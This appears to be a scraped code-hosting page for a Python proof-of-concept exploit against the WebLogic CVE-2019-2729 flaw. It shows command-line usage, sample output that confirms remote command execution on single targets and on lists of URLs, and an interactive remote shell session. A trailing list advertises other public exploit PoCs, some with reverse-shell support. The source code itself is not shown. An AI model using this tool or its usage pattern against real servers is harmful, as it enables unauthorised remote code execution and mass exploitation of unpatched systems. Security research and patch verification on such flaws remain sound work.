PoC for exploiting CVE-2019-2729 on WebLogic

Overview

CVE-2019-2729 - creal

PoC for exploiting CVE-2019-2729 on WebLogic

Exploit Usage

python3 creal.py -h
usage: creal.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command
  -s SH, --shell SH     url to connect

Exploit single target:

$ python3 creal.py -u http://IP:PORT -c id

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx

uid=500(UID) gid=500(GID) groups=500(GROUP)

Exploit url list

$ python3 creal.py -f list.txt -c id

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

[++++++] VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx

uid=500(UID) gid=500(GID) groups=500(GROUP)

[-] NOT VULNERABLE: http://xxx.xxx.xxx.xxx:xxxx
[!] There was an error connecting!

--------------------------
Vulnerable targets scanned:
[+] http://xxx.xxx.xxx.xxx:xxxx

Interactive shell

$ python3 creal.py -s http://IP:PORT

 ____ ____  _____ ____  _
/   _Y  __\/  __//  _ \/ \
|  / |  \/||  \  | / \|| |
|  \_|    /|  /_ | |-||| |_/\
\____|_/\_\\____\\_/ \\\____/
            </coded by Luchoane>

Welcome to the interactive shell for: http://xxx.xxx.xxx.xxx:xxxx
User: USER

> id
uid=500(UID) gid=500(GID) groups=500(GROUP)

> whoami
USER

> which nc
/usr/bin/nc
You might also like...

PoC for GLPI CVE-2022-31061

CVE-2022-31061 PoC for GLPI CVE-2022-31061 A Proof of Concept for GLPI = 9.3.0 and 10.0.2 - Unauthenticated SQL injection on login page Context : P

Sep 12, 2022

cve-2022-33891-poc

cve-2022-33891-poc

cve-2022-33891 Usage: pip3 install requests # If you do not use the -d parameter, the dnslog domain name will be automatically applied for you. # 如果你

Sep 15, 2022

PoC for ManageEngine ADAudit Plus CVE-2022-28219

CVE-2022-28219 POC for CVE-2022-28219 affecting ManageEngine ADAudit Plus builds 7060 Technical Analysis More details on our blog: https://www.horiz

Sep 21, 2022

PoC for CVE-2022-26809, analisys and considerations are shown in the github.io.

PoC-CVE-2022-26809 PoC for CVE-2022-26809, analisys and considerations are shown in the github.io. The PoC has been writtin overriding Impacket functi

Sep 21, 2022

Zimbra CVE-2022-27925 PoC

CVE-2022-27925 Description On May 10, 2022, Zimbra released versions 9.0.0 patch 24 and 8.8.15 patch 31 to address multiple vulnerabilities in Zimbra

Sep 22, 2022

PoC for CVE-2022-34265 (Django)

CVE-2022-34265 Usage start docker-compose build docker-compose up -d stop docker-compose down PoC verification of Django vulnerability (CVE-2022-34265

Sep 20, 2022

PrintNightmare (CVE-2021-34527) PoC Exploit

PrintNightmare (CVE-2021-34527) PoC Exploit

PrintNightmare (CVE-2021-34527) This version of the PrintNightmare exploit is heavily based on the code created by Cube0x0, with the following feature

Sep 26, 2022

CVE-2021-31800 POC

CVE-2021-31800 POC

Impacket SECUREAUTH LABS. Copyright (C) 2022 SecureAuth Corporation. All rights reserved. Impacket is a collection of Python classes for working with

Sep 2, 2022

CVE-2022-32548-RCE-POC

CVE-2022-32548-RCE-POC

CVE-2022-32548-RCE-POC DrayTek unauthenticated remote code execution vulnerability (CVE-2022-32548) in /cgi-bin/wlogin.cgi via username field Technica

Sep 20, 2022
Owner
Luciano Anezin
Luciano Anezin
Zimbra unrar vulnerability. Now there are already POC available, it is safe to release our POC.

Zimbra-CVE-2022-30333 Zimbra unrar vulnerability. Now there are already POC available, it is safe to release our POC. CVE-2022-30333 Zimbra UNRAR vuln

ASL IT Security 5 Aug 15, 2022
CVE-2022-22963 PoC

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-R

Nicolas Krassas 101 Sep 5, 2022
Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit

Spring4Shell PoC Application This is a dockerized application that is vulnerable to the Spring4Shell vulnerability (CVE-2022-22965). Full Java source

Brandon Forbes 270 Sep 30, 2022
CVE-2022-22965 poc including reverse-shell support

CVE-2022-22965 poc CVE-2022-22965 poc including reverse-shell and password support. Feel free to add more stuff :) How to test? $ docker run -p 9090:8

Vinicius 16 Aug 15, 2022
PoC for CVE-2022-22954 - VMware Workspace ONE Access Freemarker Server-Side Template Injection

CVE-2022-22954 PoC - VMware Workspace ONE Access Freemarker Server-Side Template Injection A vulnerability, which was classified as very critical, was

DrDv 5 Jul 15, 2022
A Safer PoC for CVE-2022-22965 (Spring4Shell)

Safer_PoC_CVE-2022-22965 A Safer PoC for CVE-2022-22965 (Spring4Shell) Functionality Creates a file called CVE_2022-22965_exploited.txt in the tomcat

Colin Cowie 45 Sep 7, 2022
POC for CVE-2022-1388

CVE-2022-1388 POC for CVE-2022-1388 affecting multiple F5 products. Follow the Horizon3.ai Attack Team on Twitter for the latest security research: Ho

Horizon 3 AI Inc 219 Sep 26, 2022
Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp

CVE-2022-26134 Confluence OGNL expression injected RCE(CVE-2022-26134) poc and exp Usage Edit the python script. if __name__ == '__main__': taget

SNCKER 25 Aug 27, 2022
[PoC] Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE)

CVE-2022-26134 - OGNL injection vulnerability. Script proof of concept that exploits the remote code execution vulnerability affecting Atlassian Confl

Samy Younsi 258 Aug 24, 2022
Apache Spark Command Injection PoC Exploit for CVE-2022-33891

CVE-2022-33891 PoC PoC for CVE-2022-33891, with ability to set custom payloads. Not vulnerable by default; vulnerable when: ./spark-submit --conf spar

Alex John, B 23 Sep 11, 2022